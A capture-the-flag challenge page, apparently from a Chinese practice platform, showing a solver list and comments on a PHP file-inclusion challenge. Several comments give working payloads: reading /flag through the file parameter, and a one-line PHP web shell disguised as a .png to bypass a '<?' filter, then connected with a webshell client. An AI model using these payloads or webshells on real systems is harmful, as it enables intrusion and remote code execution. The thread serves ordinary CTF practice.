评分(5)
解题动态
海浪geigei 攻破了该题 42分钟前
alfsage 攻破了该题 11小时前
Hehe0619 攻破了该题 21小时前
ww__ 攻破了该题 1天前
a1451753998 攻破了该题 1天前
dahuaaistudy 攻破了该题 1天前
YGLZ 攻破了该题 2天前
zhuizhui 攻破了该题 2天前
人闲桂花落 攻破了该题 3天前
roopelee 攻破了该题 3天前
dwx1583 攻破了该题 3天前
mecurio 攻破了该题 5天前
qidianzhi 攻破了该题 5天前
跃迁ctfer 攻破了该题 6天前
hackerbugku 攻破了该题 6天前
Future92 攻破了该题 7天前
maomaoht 攻破了该题 7天前
aaaaab 攻破了该题 8天前
千机www 攻破了该题 9天前
评论
wuzhengke 2年前
举报
http://114.67.175.224:14357/index.php?file=/flag
spiritboy 2年前
举报
index.php?file=file:///flag 直接一把梭
15338641414 3年前
举报
http://114.67.175.224:15047/index.php?file=/flag,写一句话木马,<script language=php>system("ls /")</script> 查看根目录下的文件,发现flag文件,令file=/flag,即可获得flag
落叶满阶红 3年前
举报
注意一是屏蔽了<?,需要用<script language=php>写马,二是蚁剑不要直接连接图片,,记得加?file=
HuangYanQwQ 2年前
举报
直接把hello.php改成 /flag 就秒出了
夜雨 3年前
举报
文件上传+图片一句马 题解:https://www.yeyusmile.top/archives/fileinclude2
你能刑 3年前
举报
包含/flag就行
树木有点绿 3年前
举报
无脑/flag直接获得flag哈哈哈
青蛙骑士 3年前
举报
别卷了阿财
liln0te 3年前
举报
看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以
lysr 3年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功